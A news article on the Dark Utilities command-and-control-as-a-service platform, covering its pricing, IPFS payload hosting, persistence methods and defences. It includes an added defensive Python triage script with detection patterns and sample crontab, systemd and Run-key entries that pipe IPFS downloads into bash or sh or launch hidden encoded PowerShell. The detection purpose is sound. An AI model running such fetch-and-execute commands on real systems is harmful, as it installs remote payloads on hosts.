Dark Utilities C2 service draws thousands of cyber criminals

Nascent platform provides miscreants an easier and cheaper way to launch remote access, DDoS, and other attacks

A platform that makes it easier for cyber criminals to establish command-and-control (C2) servers has already attracted 3,000 users since launching earlier this year, and will likely expand its client list in the coming months.

Called Dark Utilities, the service provides a full range of C2 capabilities to give attackers an easier and inexpensive platform for launching remote access, command execution, cryptocurrency mining, and distributed denial-of-services (DDoS) attacks. The operators of the service also provide technical support and help for platform users via communities created on the Discord and Telegram messaging apps.

Dark Utilities is the latest example of malware-as-a-service (MaaS) and ransomware-as-a-service (RaaS) that diversify cyber criminals' revenue by letting them profit from less-skilled programmers on top of their own exploits.

It also echoes other trends including the rise of initial access brokers, who compromise systems and then sell that access to others who use it to launch attacks.

C2 servers act as the hub for cyber criminals during attacks, enabling them to manage their malware by sending commands and payloads and receiving data that is exfiltrated from infected systems. Through Dark Utilities, adversaries get a platform that supports payloads for Windows, Linux, and Python-based attacks without having to create channels to a C2 server.

"It's a key component to expedite the development of and lower the bar to RaaS and MaaS infrastructure," Andrew Hay, COO for LARES Consulting, told The Register. "With such an easy-to-use platform, developers need only worry about building or modifying the malware components of their attack."

It's also inexpensive and appears to be a volume play. According to researchers from Cisco's Talos threat intelligence organization, users can get access to the platform – which is hosted on the clear internet and Tor network – along with the associated payloads and API endpoints for €9.99 ($10.17). In a blog post, the Talos researchers wrote that in the months since the C2 platform was established, it has generated about €30,000 – more than $30,500.

"Given the relatively low cost compared to the amount of functionality the platform offers, it is likely to be attractive to adversaries attempting to compromise systems without requiring them to create their own C2 implementation within their malware payloads," the Talos researchers wrote. "We expect this platform will continue to rapidly expand its user base. This will likely result in an increase in the volume of malware samples in the wild attempting to establish C2 using the platform."

Hay said that "if a service can be modified to provide capabilities to a larger audience and at a price point that is consumable, the evolution of the service offering will continue."

Talos researchers wrote that almost immediately after Dark Utilities was established, they saw malware samples in the wild using the service to establish C2 communications channels and remote access capabilities on infected Windows and Linux systems.

The C2-as-a-service (C2aaS) platform more recently added support for other architectures, including ARM64 and ARMV71, which can be leveraged to target embedded devices like routers, phones and Internet-of-Things (IoT) devices.

The platform uses InterPlanetary File System (IPFS) peer-to-peer networking for hosting the payloads to make them more persistent, easier to hide, and more difficult to take down. Cybersecurity vendor Trustwave last month wrote about how threat groups are, for the same reasons, increasingly taking advantage of the decentralized nature of IPFS for their phishing attacks.

IPFS is "explicitly designed to prevent centralized authorities from taking action on content hosted there," the Talos researchers wrote. "We have observed adversaries increasingly making use of this infrastructure for payload hosting and retrieval as it effectively provides 'bulletproof hosting'."

Dark Utilities uses Discord for authentication. Once authenticated, users see a dashboard for generating payloads for a chosen OS, which are then deployed against targeted hosts. After creating a C2 channel, the attacker gets full access to the compromised systems to run the payloads.

Once the OS is chosen, a command string is created that the attackers will embed into PowerShell or Bash, according to Talos. To gain persistence, the payload creates a Registry key on Windows systems or a crontab entry or a systemd service on Linux machines.
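As an added illustration, not code from the Talos report or from The Register: a small triage script that scans persistence entries of the three kinds named above (crontab lines, systemd ExecStart values, Windows Run-key values) for the traits the article describes, namely an embedded Bash or PowerShell command that fetches a payload from IPFS and pipes it into an interpreter. The sample entries and the IPFS CIDs in them are constructed placeholders, not indicators from the report, and the hidden/encoded-PowerShell heuristic is a general one that the article does not specifically attribute to Dark Utilities.

```python
import re

# Defender-side triage rules: (rule name, compiled regex). Each rule
# targets one trait of the persistence mechanisms described above.
RULES = [
    # Payload fetched from IPFS: gateway path or ipfs:// scheme followed by
    # a CIDv0 ("Qm" + 44 base58 chars) or a CIDv1 ("baf" + base32 chars).
    ("ipfs_payload", re.compile(
        r"(?:/ipfs/|ipfs://)\s*(?:Qm[1-9A-HJ-NP-Za-km-z]{44}|baf[a-z2-7]{50,})")),
    # Download piped straight into a shell or PowerShell interpreter.
    ("download_and_exec", re.compile(
        r"(?:curl|wget|Invoke-WebRequest|iwr|DownloadString)\b.*?"
        r"(?:\|\s*(?:ba)?sh\b|\bIEX\b|Invoke-Expression)", re.I)),
    # PowerShell launched hidden and/or with an encoded command (generic
    # heuristic, assumed here rather than taken from the article).
    ("hidden_or_encoded_powershell", re.compile(
        r"powershell\b.*?(?:-w(?:indowstyle)?\s+hidden"
        r"|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,})", re.I)),
]

# Constructed sample persistence entries ("<source>: <command>"). The CIDs
# and the base64 blob are placeholders, not real indicators.
SAMPLE_ENTRIES = [
    "crontab: @reboot /bin/bash -c 'curl -s https://ipfs.io/ipfs/"
    "QmTestTestTestTestTestTestTestTestTestTestTestTest | bash'",
    "crontab: 0 3 * * * /usr/bin/apt-get update",
    "systemd: ExecStart=/bin/sh -c 'wget -qO- https://cloudflare-ipfs.com/ipfs/"
    "bafybeitesttesttesttesttesttesttesttesttesttesttesttesttest | sh'",
    "systemd: ExecStart=/usr/sbin/sshd -D",
    r"registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater"
    " = powershell -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB",
    r"registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive"
    r" = C:\Users\x\OneDrive.exe /background",
]


def triage(entries):
    """Return {entry: [matched rule names]} for entries hitting at least one rule."""
    hits = {}
    for entry in entries:
        matched = [name for name, rx in RULES if rx.search(entry)]
        if matched:
            hits[entry] = matched
    return hits


if __name__ == "__main__":
    for entry, reasons in triage(SAMPLE_ENTRIES).items():
        print(f"[{', '.join(reasons)}] {entry}")
```

The two IPFS-backed download-and-execute entries and the hidden PowerShell Run-key value are flagged; the routine apt-get, sshd and OneDrive entries are not.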

The researchers wrote that Dark Utilities was likely created and is being managed by a persona that uses the moniker Inplex-sys. The persona doesn't have much of a history in the cybercrime world – though just after Dark Utilities was launched, it was advertised within the high-profile Lapsus$ Group's Telegram channel. They believe Inplex-sys is located in France.

Given how quickly Dark Utilities has been able to collect users – and how likely it is to attract many more in the coming months – "organizations should be aware of these C2aaS platforms and ensure they have security controls in place to help protect their environments," the researchers wrote.

That includes tools for protecting endpoints and detecting malicious emails sent by attackers. Enterprises also need next-generation firewall appliances for detecting malicious activity associated with the threat from Dark Utilities users and a malware analytics tool for identifying malicious binaries.

They should also use multifactor authentication, along with tools for blocking access to possibly malicious sites and for testing suspicious sites before users can reach them.

LARES's Hay also advocates education.

"If an organization doesn't continuously expand its knowledge around evolving threats and tools, it may find itself caught off-guard if the attack is aimed its way," he said. "Knowing how tools work and detecting their presence [and] activity should be an objective of any operational security monitoring and incident response program." ®
